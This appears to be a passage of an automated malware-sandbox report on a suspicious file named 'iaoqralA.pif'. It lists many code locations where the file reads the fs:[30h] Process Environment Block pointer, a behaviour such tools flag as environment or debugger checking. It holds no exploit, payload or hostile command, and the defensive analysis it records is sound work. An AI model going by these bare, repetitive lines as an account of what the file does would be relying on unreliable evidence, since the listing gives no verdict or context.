Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE3A78 mov eax, dword ptr fs:[00000030h]	6_2_1BEE3A78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEE3A78 mov eax, dword ptr fs:[00000030h]	6_2_1BEE3A78
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE49A40 mov ecx, dword ptr fs:[00000030h]	6_2_1BE49A40
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DA20 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DA20
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7DA20 mov eax, dword ptr fs:[00000030h]	6_2_1BE7DA20
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BA30 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BA30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BA30 mov ecx, dword ptr fs:[00000030h]	6_2_1BE5BA30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BA30 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BA30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BA30 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BA30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BA30 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BA30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BA30 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BA30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFBA0B mov eax, dword ptr fs:[00000030h]	6_2_1BEFBA0B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFBA0B mov eax, dword ptr fs:[00000030h]	6_2_1BEFBA0B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFBA0B mov eax, dword ptr fs:[00000030h]	6_2_1BEFBA0B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFBA0B mov eax, dword ptr fs:[00000030h]	6_2_1BEFBA0B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE85A01 mov eax, dword ptr fs:[00000030h]	6_2_1BE85A01
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE85A01 mov ecx, dword ptr fs:[00000030h]	6_2_1BE85A01
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE85A01 mov eax, dword ptr fs:[00000030h]	6_2_1BE85A01
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE85A01 mov eax, dword ptr fs:[00000030h]	6_2_1BE85A01
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BECDA1D mov eax, dword ptr fs:[00000030h]	6_2_1BECDA1D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0FA02 mov eax, dword ptr fs:[00000030h]	6_2_1BF0FA02
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4BA10 mov eax, dword ptr fs:[00000030h]	6_2_1BE4BA10
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF7A11 mov edi, dword ptr fs:[00000030h]	6_2_1BEF7A11
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE79A18 mov ecx, dword ptr fs:[00000030h]	6_2_1BE79A18
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED19EE mov eax, dword ptr fs:[00000030h]	6_2_1BED19EE
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED19EE mov eax, dword ptr fs:[00000030h]	6_2_1BED19EE
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED19EE mov eax, dword ptr fs:[00000030h]	6_2_1BED19EE
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0B9EE mov eax, dword ptr fs:[00000030h]	6_2_1BF0B9EE
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0B9EE mov ecx, dword ptr fs:[00000030h]	6_2_1BF0B9EE
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0B9EE mov eax, dword ptr fs:[00000030h]	6_2_1BF0B9EE
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE559C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE559C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE559C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE559C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE559C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE559C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE559C0 mov eax, dword ptr fs:[00000030h]	6_2_1BE559C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF2B9DF mov eax, dword ptr fs:[00000030h]	6_2_1BF2B9DF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF2B9DF mov eax, dword ptr fs:[00000030h]	6_2_1BF2B9DF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7D9D0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7D9D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7D9D0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7D9D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7D9D0 mov esi, dword ptr fs:[00000030h]	6_2_1BE7D9D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7D9D0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7D9D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7D9D0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7D9D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7D9D0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7D9D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7D9D0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7D9D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7D9D0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7D9D0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE599BE mov eax, dword ptr fs:[00000030h]	6_2_1BE599BE
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED9983 mov eax, dword ptr fs:[00000030h]	6_2_1BED9983
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov ecx, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov ecx, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFF99B mov eax, dword ptr fs:[00000030h]	6_2_1BEFF99B
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4B991 mov eax, dword ptr fs:[00000030h]	6_2_1BE4B991
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4B991 mov eax, dword ptr fs:[00000030h]	6_2_1BE4B991
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0598D mov eax, dword ptr fs:[00000030h]	6_2_1BF0598D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0598D mov eax, dword ptr fs:[00000030h]	6_2_1BF0598D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0598D mov eax, dword ptr fs:[00000030h]	6_2_1BF0598D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47967 mov eax, dword ptr fs:[00000030h]	6_2_1BE47967
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE77962 mov eax, dword ptr fs:[00000030h]	6_2_1BE77962
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8196E mov eax, dword ptr fs:[00000030h]	6_2_1BE8196E
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8196E mov eax, dword ptr fs:[00000030h]	6_2_1BE8196E
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0F97D mov eax, dword ptr fs:[00000030h]	6_2_1BF0F97D
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED5960 mov eax, dword ptr fs:[00000030h]	6_2_1BED5960
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8B970 mov eax, dword ptr fs:[00000030h]	6_2_1BE8B970
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8B970 mov eax, dword ptr fs:[00000030h]	6_2_1BE8B970
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8B970 mov eax, dword ptr fs:[00000030h]	6_2_1BE8B970
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7D978 mov eax, dword ptr fs:[00000030h]	6_2_1BE7D978
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5F950 mov eax, dword ptr fs:[00000030h]	6_2_1BE5F950
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5F950 mov eax, dword ptr fs:[00000030h]	6_2_1BE5F950
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE69950 mov eax, dword ptr fs:[00000030h]	6_2_1BE69950
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE69950 mov eax, dword ptr fs:[00000030h]	6_2_1BE69950
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDB953 mov eax, dword ptr fs:[00000030h]	6_2_1BEDB953
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF05930 mov eax, dword ptr fs:[00000030h]	6_2_1BF05930
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF05930 mov ecx, dword ptr fs:[00000030h]	6_2_1BF05930
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE47931 mov eax, dword ptr fs:[00000030h]	6_2_1BE47931
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4F910 mov eax, dword ptr fs:[00000030h]	6_2_1BE4F910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7B919 mov eax, dword ptr fs:[00000030h]	6_2_1BE7B919
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF5910 mov eax, dword ptr fs:[00000030h]	6_2_1BEF5910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF5910 mov eax, dword ptr fs:[00000030h]	6_2_1BEF5910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF5910 mov eax, dword ptr fs:[00000030h]	6_2_1BEF5910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF5910 mov eax, dword ptr fs:[00000030h]	6_2_1BEF5910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF5910 mov eax, dword ptr fs:[00000030h]	6_2_1BEF5910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF5910 mov eax, dword ptr fs:[00000030h]	6_2_1BEF5910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF5910 mov eax, dword ptr fs:[00000030h]	6_2_1BEF5910
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE638E0 mov eax, dword ptr fs:[00000030h]	6_2_1BE638E0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE638E0 mov eax, dword ptr fs:[00000030h]	6_2_1BE638E0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE638E0 mov eax, dword ptr fs:[00000030h]	6_2_1BE638E0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0F8F8 mov eax, dword ptr fs:[00000030h]	6_2_1BF0F8F8
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED98E7 mov eax, dword ptr fs:[00000030h]	6_2_1BED98E7
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE538C4 mov eax, dword ptr fs:[00000030h]	6_2_1BE538C4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE538C4 mov eax, dword ptr fs:[00000030h]	6_2_1BE538C4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE538C4 mov eax, dword ptr fs:[00000030h]	6_2_1BE538C4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE538C4 mov eax, dword ptr fs:[00000030h]	6_2_1BE538C4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE538C4 mov eax, dword ptr fs:[00000030h]	6_2_1BE538C4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE538C4 mov eax, dword ptr fs:[00000030h]	6_2_1BE538C4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE538C4 mov eax, dword ptr fs:[00000030h]	6_2_1BE538C4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE578D9 mov eax, dword ptr fs:[00000030h]	6_2_1BE578D9
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE578D9 mov eax, dword ptr fs:[00000030h]	6_2_1BE578D9
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0D8B0 mov eax, dword ptr fs:[00000030h]	6_2_1BF0D8B0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0D8B0 mov eax, dword ptr fs:[00000030h]	6_2_1BF0D8B0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0F889 mov eax, dword ptr fs:[00000030h]	6_2_1BF0F889
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEEB890 mov eax, dword ptr fs:[00000030h]	6_2_1BEEB890
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEEB890 mov eax, dword ptr fs:[00000030h]	6_2_1BEEB890
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4D860 mov eax, dword ptr fs:[00000030h]	6_2_1BE4D860
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4D878 mov eax, dword ptr fs:[00000030h]	6_2_1BE4D878
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE81876 mov eax, dword ptr fs:[00000030h]	6_2_1BE81876
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE81876 mov eax, dword ptr fs:[00000030h]	6_2_1BE81876
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91843 mov eax, dword ptr fs:[00000030h]	6_2_1BE91843
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91843 mov eax, dword ptr fs:[00000030h]	6_2_1BE91843
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91843 mov eax, dword ptr fs:[00000030h]	6_2_1BE91843
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91843 mov eax, dword ptr fs:[00000030h]	6_2_1BE91843
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91843 mov eax, dword ptr fs:[00000030h]	6_2_1BE91843
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91843 mov eax, dword ptr fs:[00000030h]	6_2_1BE91843
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8182A mov eax, dword ptr fs:[00000030h]	6_2_1BE8182A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE83820 mov eax, dword ptr fs:[00000030h]	6_2_1BE83820
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDD820 mov ecx, dword ptr fs:[00000030h]	6_2_1BEDD820
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDD820 mov eax, dword ptr fs:[00000030h]	6_2_1BEDD820
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDD820 mov eax, dword ptr fs:[00000030h]	6_2_1BEDD820
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE79803 mov eax, dword ptr fs:[00000030h]	6_2_1BE79803
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF1800 mov eax, dword ptr fs:[00000030h]	6_2_1BEF1800
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF1800 mov eax, dword ptr fs:[00000030h]	6_2_1BEF1800
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0F80A mov eax, dword ptr fs:[00000030h]	6_2_1BF0F80A
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BFEC mov eax, dword ptr fs:[00000030h]	6_2_1BE8BFEC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BFEC mov eax, dword ptr fs:[00000030h]	6_2_1BE8BFEC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BFEC mov eax, dword ptr fs:[00000030h]	6_2_1BE8BFEC
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE81FCD mov eax, dword ptr fs:[00000030h]	6_2_1BE81FCD
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE81FCD mov eax, dword ptr fs:[00000030h]	6_2_1BE81FCD
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE81FCD mov eax, dword ptr fs:[00000030h]	6_2_1BE81FCD
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53FC2 mov eax, dword ptr fs:[00000030h]	6_2_1BE53FC2
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0BFC0 mov ecx, dword ptr fs:[00000030h]	6_2_1BF0BFC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0BFC0 mov eax, dword ptr fs:[00000030h]	6_2_1BF0BFC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4BFD0 mov eax, dword ptr fs:[00000030h]	6_2_1BE4BFD0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED3FD7 mov eax, dword ptr fs:[00000030h]	6_2_1BED3FD7
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE91FB8 mov eax, dword ptr fs:[00000030h]	6_2_1BE91FB8
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE8BFB0 mov eax, dword ptr fs:[00000030h]	6_2_1BE8BFB0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov ecx, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov ecx, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov eax, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov ecx, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov ecx, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov eax, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov ecx, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov ecx, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov eax, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov ecx, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov ecx, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE61F92 mov eax, dword ptr fs:[00000030h]	6_2_1BE61F92
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4FF90 mov edi, dword ptr fs:[00000030h]	6_2_1BE4FF90
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF3F90 mov eax, dword ptr fs:[00000030h]	6_2_1BEF3F90
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF3F90 mov eax, dword ptr fs:[00000030h]	6_2_1BEF3F90
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7BF60 mov eax, dword ptr fs:[00000030h]	6_2_1BE7BF60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BECFF42 mov eax, dword ptr fs:[00000030h]	6_2_1BECFF42
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE51F50 mov eax, dword ptr fs:[00000030h]	6_2_1BE51F50
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE87F51 mov eax, dword ptr fs:[00000030h]	6_2_1BE87F51
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEF7F3E mov eax, dword ptr fs:[00000030h]	6_2_1BEF7F3E
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0DF2F mov eax, dword ptr fs:[00000030h]	6_2_1BF0DF2F
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDDF10 mov eax, dword ptr fs:[00000030h]	6_2_1BEDDF10
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BED1F13 mov eax, dword ptr fs:[00000030h]	6_2_1BED1F13
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE83EEB mov ecx, dword ptr fs:[00000030h]	6_2_1BE83EEB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE83EEB mov eax, dword ptr fs:[00000030h]	6_2_1BE83EEB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE83EEB mov eax, dword ptr fs:[00000030h]	6_2_1BE83EEB
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53EE1 mov eax, dword ptr fs:[00000030h]	6_2_1BE53EE1
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53EF4 mov eax, dword ptr fs:[00000030h]	6_2_1BE53EF4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53EF4 mov eax, dword ptr fs:[00000030h]	6_2_1BE53EF4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE53EF4 mov eax, dword ptr fs:[00000030h]	6_2_1BE53EF4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1BEE6 mov eax, dword ptr fs:[00000030h]	6_2_1BF1BEE6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1BEE6 mov eax, dword ptr fs:[00000030h]	6_2_1BF1BEE6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1BEE6 mov eax, dword ptr fs:[00000030h]	6_2_1BF1BEE6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF1BEE6 mov eax, dword ptr fs:[00000030h]	6_2_1BF1BEE6
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE4BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE4BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE5BEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE5BEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE7FEC0 mov eax, dword ptr fs:[00000030h]	6_2_1BE7FEC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDFEC5 mov eax, dword ptr fs:[00000030h]	6_2_1BEDFEC5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF09EDF mov eax, dword ptr fs:[00000030h]	6_2_1BF09EDF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF09EDF mov eax, dword ptr fs:[00000030h]	6_2_1BF09EDF
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BF0DEB0 mov eax, dword ptr fs:[00000030h]	6_2_1BF0DEB0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4DEA5 mov eax, dword ptr fs:[00000030h]	6_2_1BE4DEA5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4DEA5 mov ecx, dword ptr fs:[00000030h]	6_2_1BE4DEA5
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE4FEA0 mov eax, dword ptr fs:[00000030h]	6_2_1BE4FEA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEDDEAA mov eax, dword ptr fs:[00000030h]	6_2_1BEDDEAA
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFDEB0 mov eax, dword ptr fs:[00000030h]	6_2_1BEFDEB0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BEFDEB0 mov ecx, dword ptr fs:[00000030h]	6_2_1BEFDEB0
